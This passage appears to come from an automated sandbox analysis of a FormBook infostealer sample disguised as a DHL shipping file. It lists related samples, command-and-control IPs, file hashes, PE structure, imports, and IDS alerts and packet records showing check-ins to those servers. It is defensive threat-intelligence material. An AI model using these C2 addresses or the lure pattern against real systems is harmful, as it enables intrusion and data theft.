                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 195.110.124.133
                                                                                    DONGFONG-TWDongFongTechnologyCoLtdTWDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 101.0.232.112
                                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 119.15.228.125
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    SEDO-ASDEDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                    Category:dropped
                                                                                    Size (bytes):196608
                                                                                    Entropy (8bit):1.121297215059106
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\totten

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.99346522941898
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:CL7t2RVbXJRsOHtKhGeS2QAGXz417GY2C8Gl13oB6LwC:S7t275KNadXz417G1C8sMC
                                                                                    MD5:0B926B86EEF6F68EB2C06BAD0279A063
                                                                                    SHA1:274138A283CD4532256147C3BD8695C93720278F
                                                                                    SHA-256:17E6D34828E79EA551993C58F0433F928C7635B409234D021156473B42BA29D5
                                                                                    SHA-512:209F19BF1976FEDF0CE393D6BDF9670D5986C01AC29172A8DC6F4770387F982A4BE4B2B824AFE08EE8E7F580B33F001D977DE7A0ACF3C33AB3D814E793428CFD
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:~j...A283l.1...y.2J....08...A2834LH8IHN9E32II6H430EX1A2834.H8IFQ.K3.@...5..d.Y(A.CF#/J(%nZ$]\&=.*Q.B06.(\.w{.hU&,+.H>8mI6H430E!0H..SS.uX..sY".(...rTT._....XT.V.t.^.a[*!.(S.0EX1A283d.H8.IO9.[..I6H430EX.A0985GH8YLN9E32II6H.&0EX!A28.0LH8.HN)E32KI6N430EX1A4834LH8IHn=E30II6H432E..A2(34\H8IH^9E#2II6H4#0EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2.GQ4<8IH.6A32YI6H$70EH1A2834LH8IHN9E.2I)6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H430EX1A2834LH8IHN9E32II6H4

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.389924888043252
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:rDHL8350232025-2.exe
                                                                                    File size:1'563'136 bytes
                                                                                    MD5:6f732c7020a0eba292610a19133b3178
                                                                                    SHA1:f2ea127e9532671903a402a896269f8cd44308ed
                                                                                    SHA256:0fcc36b8e2936fa3fcbc8b618a9033832eb9a833dacd014fc2849c953ac8b7e2
                                                                                    SHA512:682e008e8cd34023383d9136d3ac20205af4c5e5109114efed104568e57547f772af106cd19fa15096923541b38f43808e6c2c44817bb24fc1f64de2e989abe1
                                                                                    SSDEEP:24576:cqDEvCTbMWu7rQYlBQcBiT6rprG8ahd14KGmlCgsk2jRbrR9ZiBRPgHWWFcru/05:cTvC/MTQYxsWR7ahdezdbNiBRPgH0ru
                                                                                    TLSH:E375D0027381C022FF9B92734B9AF7515BBC69260123E62F13981DB9BD705B1563E7A3
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                    File Icon

                                                                                    Icon Hash:aaf3e3e3938382a0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677C8A43 [Tue Jan 7 01:58:27 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FE2DD138353h
                                                                                    jmp 00007FE2DD137C5Fh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FE2DD137E3Dh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FE2DD137E0Ah
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007FE2DD13A9FDh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FE2DD13AA48h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FE2DD13AA31h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xa6fc0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x17b0000x7594.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xd40000xa6fc00xa70008c0d56d54a1373d382fa3dbb201e701fFalse0.9610383724738024data7.958469511750788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x17b0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                    RT_RCDATA0xdc7b80x9e286data1.000317992510196
                                                                                    RT_GROUP_ICON0x17aa400x76dataEnglishGreat Britain0.6610169491525424
                                                                                    RT_GROUP_ICON0x17aab80x14dataEnglishGreat Britain1.25
                                                                                    RT_GROUP_ICON0x17aacc0x14dataEnglishGreat Britain1.15
                                                                                    RT_GROUP_ICON0x17aae00x14dataEnglishGreat Britain1.25
                                                                                    RT_VERSION0x17aaf40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                    RT_MANIFEST0x17abd00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                    Imports

                                                                                    DLLImport
                                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                    UxTheme.dllIsThemeActive
                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishGreat Britain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-07T15:32:24.303849+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549736154.215.72.11080TCP
                                                                                    2025-01-07T15:32:56.245059+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549933116.50.37.24480TCP
                                                                                    2025-01-07T15:34:17.782006+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998485.159.66.9380TCP
                                                                                    2025-01-07T15:34:31.105080+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998891.195.240.9480TCP
                                                                                    2025-01-07T15:34:52.926156+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999266.29.149.4680TCP
                                                                                    2025-01-07T15:35:06.336026+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549996195.110.124.13380TCP
                                                                                    2025-01-07T15:35:35.872835+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550000217.196.55.20280TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 7, 2025 15:32:23.368675947 CET4973680192.168.2.5154.215.72.110
                                                                                    Jan 7, 2025 15:32:23.373539925 CET8049736154.215.72.110192.168.2.5
                                                                                    Jan 7, 2025 15:32:23.373620033 CET4973680192.168.2.5154.215.72.110
                                                                                    Jan 7, 2025 15:32:23.375811100 CET4973680192.168.2.5154.215.72.110
                                                                                    Jan 7, 2025 15:32:23.380569935 CET8049736154.215.72.110192.168.2.5
                                                                                    Jan 7, 2025 15:32:24.303663015 CET8049736154.215.72.110192.168.2.5
                                                                                    Jan 7, 2025 15:32:24.303752899 CET8049736154.215.72.110192.168.2.5
                                                                                    Jan 7, 2025 15:32:24.303848982 CET4973680192.168.2.5154.215.72.110
                                                                                    Jan 7, 2025 15:32:24.306898117 CET4973680192.168.2.5154.215.72.110
                                                                                    Jan 7, 2025 15:32:24.311675072 CET8049736154.215.72.110192.168.2.5
                                                                                    Jan 7, 2025 15:32:47.780091047 CET4988880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:47.785717964 CET8049888116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:47.785804033 CET4988880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:47.787595987 CET4988880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:47.792550087 CET8049888116.50.37.244192.168.2.5
